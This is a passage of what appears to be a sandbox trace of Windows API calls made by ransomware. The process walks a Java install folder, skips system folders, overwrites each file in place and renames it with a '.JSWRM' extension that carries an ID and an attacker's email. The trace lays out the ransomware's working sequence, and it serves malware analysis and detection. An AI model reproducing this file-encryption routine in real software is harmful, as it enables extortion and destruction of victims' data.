(lpString1="plugin.jar", lpString2="documents and settings") returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="$RECYCLE.BIN") returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="system volume information") returned -1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="msocache") returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="plugin.jar", lpUsedDefaultChar=0x0) returned 10 [0071.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="plugin.jar", lpUsedDefaultChar=0x0) returned 10 [0071.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0071.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.107] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.108] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1923211) returned 1 [0071.108] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0071.108] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0071.122] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.122] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.123] CloseHandle (hObject=0x454) returned 1 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0071.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0071.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0071.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0071.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.123] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0071.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.124] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="psfont.properties.ja", cAlternateFileName="PSFONT~1.JA")) returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2=".") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="..") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="...") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="windows") returned -1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="recovery") returned -1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="perflogs") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="documents and settings") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="$RECYCLE.BIN") returned 1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="system volume information") returned -1 [0071.124] lstrcmpiW (lpString1="psfont.properties.ja", lpString2="msocache") returned 1 [0071.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0071.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x240ef8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfont.properties.ja", lpUsedDefaultChar=0x0) returned 20 [0071.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0071.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfont.properties.ja", lpUsedDefaultChar=0x0) returned 20 [0071.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0071.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0071.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.125] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.126] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2796) returned 1 [0071.126] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae0) returned 0x24d1d8 [0071.126] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0xae0, lpOverlapped=0x0) returned 1 [0071.127] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.128] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0xae0, lpOverlapped=0x0) returned 1 [0071.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.129] CloseHandle (hObject=0x454) returned 1 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0071.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0071.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0071.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0071.130] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2899, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="psfontj2d.properties", cAlternateFileName="PSFONT~1.PRO")) returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="..") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="...") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="windows") returned -1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="recovery") returned -1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="perflogs") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="documents and settings") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="$RECYCLE.BIN") returned 1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="system volume information") returned -1 [0071.130] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="msocache") returned 1 [0071.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfontj2d.properties", lpUsedDefaultChar=0x0) returned 20 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x241038, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfontj2d.properties", lpUsedDefaultChar=0x0) returned 20 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0071.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0071.131] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.131] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10393) returned 1 [0071.131] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2890) returned 0x24d1d8 [0071.132] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x2890, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x2890, lpOverlapped=0x0) returned 1 [0071.134] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.134] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x2890, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x2890, lpOverlapped=0x0) returned 1 [0071.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.134] CloseHandle (hObject=0x454) returned 1 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0071.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0071.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0071.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.135] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x354add, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="resources.jar", cAlternateFileName="RESOUR~1.JAR")) returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2=".") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="..") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="...") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="windows") returned -1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="recovery") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="perflogs") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="documents and settings") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="$RECYCLE.BIN") returned 1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="system volume information") returned -1 [0071.135] lstrcmpiW (lpString1="resources.jar", lpString2="msocache") returned 1 [0071.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0071.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resources.jar", lpUsedDefaultChar=0x0) returned 13 [0071.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0071.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0071.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", 